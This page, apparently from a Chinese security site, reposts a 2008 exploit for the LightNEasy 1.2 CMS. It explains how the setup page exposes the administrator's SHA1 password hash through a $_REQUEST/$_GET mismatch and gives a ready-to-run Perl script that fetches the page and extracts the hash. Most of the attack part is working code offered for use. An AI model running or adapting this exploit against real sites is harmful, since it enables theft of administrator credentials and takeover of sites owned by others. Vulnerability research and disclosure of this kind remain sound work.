首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LightNEasy 1.2 (no database) Remote Hash Retrieve Exploit
来源:girex.altervista.org 作者:GiReX 发布时间:2008-04-11  
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 10/04/08

# CMS: LightNEasy 1.2 no database
# Site: lightneasy.org

# Bug: Hash Disclosure
# Exploit: Remote Hash Retrieve


# Bug Explanation: LightNEasy/lightneasy.php

  if($_GET['do']!="login" && $_GET['do']!="sitemap" && $_SESSION[$set['password']] != "1") unset($_GET['do']);
  if($_POST['submit']!=$langmessage[120] && $_POST['submit']!=$langmessage[33] && $_SESSION[$set['password']] != "1")
unset($_POST['submit']);

# $_GET['do'] is unset if we aren't admin or isn't login or sitemap

  function content() {
  ...
  switch($_REQUEST['do']) {
  ...
  case "setup": {
  ...
  <input type=\"hidden\" name=\"oldpassword\" value=\"".$set['password']."\" />

# content() diplays the HTML of the section passed with $_REQUEST['do']
# unset $_GET['do'] is not important if you switch the $_REQUEST one
# you can only see the admin's hash in hidden input and not edit it becouse $_POST['submit'] is unset


#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;

if(not defined $ARGV[0])
{
     banner();
     print "[-] Usage: perl $0 [host] [path]\n";
     print "[-] Example: perl $0 localhost /lightneasy/\n\n";
     exit;
}
my $client = new LWP::UserAgent or exit;

my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
   $target .=  $ARGV[1] unless not defined $ARGV[1];

banner();
my $response = $client->get($target . 'LightNEasy.php?do=setup');

if($response->is_success)
{
     if($response->as_string =~ /([a-f0-9]{40})/)
     {
  print "[+] Admin's SHA1 Hash: $1 \n";
  print "[+] Exploit Successfull\n";
     }
     else
     {
  print "[-] Unable to retrieve admin's hash\n";
  print "[-] Exploit Failed\n";
     }
}
else
{
     print "[-] Unable to request ${target}LightNEasy.php?do=setup\n";
     print "[-] Exploit Failed\n";
}


sub banner
{
     print "[+] LightNEasy 1.2 no database Password Retrieve Exploit\n";
     print "[+] Coded by __GiReX__\n";
     print "\n";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·LiveCart <= 1.1.1 (category id
·Borland InterBase 2007 ibserve
·KnowledgeQuest 2.5 Arbitrary A
·1024 CMS <= 1.4.2 Local File I
·phpBB Add-on Fishing Cat Porta
·XM Easy Personal FTP Server 5.
·Biz E-Banking Integrator V2 Ac
·Mumbo Jumbo Media OP4 Remote B
·LokiCMS <= 0.3.3 Remote Comman
·HP OpenView NNM v7.5.1 ovalarm
·FLABER <= 1.1 RC1 Remote Comma
·KwsPHP (Upload) Remote Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved